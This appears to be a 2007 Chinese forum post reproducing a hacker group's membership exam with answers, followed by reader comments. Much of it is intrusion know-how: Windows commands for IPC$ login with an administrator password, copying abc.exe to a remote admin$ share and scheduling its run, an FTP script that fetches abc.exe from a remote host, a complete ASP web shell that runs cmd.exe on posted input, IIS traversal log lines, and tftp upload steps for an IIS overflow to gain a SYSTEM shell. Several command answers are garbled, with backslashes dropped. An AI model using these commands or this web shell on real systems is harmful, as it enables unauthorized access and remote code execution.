岁月联盟正式成员考题(附答案)
今天我也去参加了,特意将题和答案放在此
黑客菜鸟试卷
一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三个连接指向同一目标网站,那么它们分别是什么意义?
答:
http://192.168.0.1 (目标的IP地址)
http://xyz.3322.org (目标的域名)
http://3232235521 (目标的IP地址的十进制表现形式)
二、
常用端口识别
20 21 23
25 80 110
139 443 445
答:
20 ftp
21 ftp control
23 telnet
25 SMTP
80 http
110 pop3
139 NetBIOS
443 https
445 Admin$ or Ms-ds
三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator”
c:\>net use z: \\211.87.194.121\c$
c:\>net time \\211.87.194.121
c:\>copy abc.exe \\211.87.194.121\admin$\system32
答:
c:>net use \211.87.194.121ipc$ “123456”/user:”administrator” (对远程主机进行IPC$登陆)
c:>net use z: \211.87.194.121c$ (将远程主机的c$共享映射到本地主机的z盘)
c:>net time \211.87.194.121 (获取远程主机的系统时间)
c:>copy abc.exe \211.87.194.121admin$system32 (将本地当前目录下的abc.exe复制到远程主机的%SystemRoot%system32下或winntsystem32下)
四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe
答:
c:>at \211.87.194.121 21:05 abc.exe
是将远程主机%SystemRoot%system32下或winntsystem32下的abc.exe文件在远程于21:05运行
c:>at 21:05 \211.87.194.121admin$system32abc.exe
是将远程主机%SystemRoot%system32下或winntsystem32下的abc.exe文件在本地于21:05运行
五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
答:
World wide web 服务日志
六、
netstat命令有何作用,举出两个参数进行说明。
答:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-o] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-o Displays the owning process ID associated with each connection.
-p proto Shows connections for the protocol specified by proto; proto
may be any of: TCP, UDP, TCPv6, or UDPv6. If used with the -s
option to display per-protocol statistics, proto may be any of:
IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, and UDPv6;
the -p option may be used to specify a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.
七、
试述木马的一些基本特征。
答:
1、 由客户端和服务端。
2、 客户端对服务端有较高的执行权限。
3、 通过修改注册表或者系统文件实现客户端的自动运行。
八、
如何利用脚本实现对ftp的自动操作?
答:
C:>echo open 211.87.216.131 >c:ftp.txe
C:>echo user:[email protected] >>c:ftp.txt
C:>echo get abc.exe >>c:ftp.txt
C:>echo bye >>c:ftp.txt
C:>ftp –s:c:ftp.txt
九、
下面是一个ASP木马,请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %>
答:
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
十、
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?
那么,如何在不打补丁的情况下避免这种攻击的发生?
答:
上传 最好是用tftp.exe结合本地主机的tftpserver
tftp -i yourip get idq.dll c:inetpubscriptsidq.dll
然后用ispc对远程进行溢出便可得到一个system身份的shell
Cgi 与IIS 相结合可以直接将shell溢出 比如 snake的idq溢出程序
十一、OSI模型中哪一层上有协议?分别是什么?
答:
应用层http ftp telnet...
传输层udp tcp spx
网络层ip ipx
十二、观察ping命令的返回包的TTL值,可以了解到什么?
答:
有无防火墙 操作系统 IP 路由等信息
十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业?
答:
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646 在查看目录
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647 在远程拷贝cmd.exe或者tftp.exe
目标 IP 192.168.0.1 端口69为tftp客户端伺服端口,源 IP 192.168.0.3 端口 69为tftp server打开的服务端口 之间是一次基于UPD的会话,是源端在利用IIS漏洞对目标进行上传。
十四、谈谈你对hacker和网络安全的认识
答:黑客只是一种精神,以一种特殊的方式维护祖国的尊严.(这是我做的答案,大家可以自由发挥)By:黑客VS英雄
QQ:415358518
Blog:www.hackerzhu.cn
考试内容怎么那么简单啊
2007-07-30 21:56没法呀,我也不知道怎么这么简单
2007-07-31 19:08汗....太没难度了吧.
2007-08-01 20:09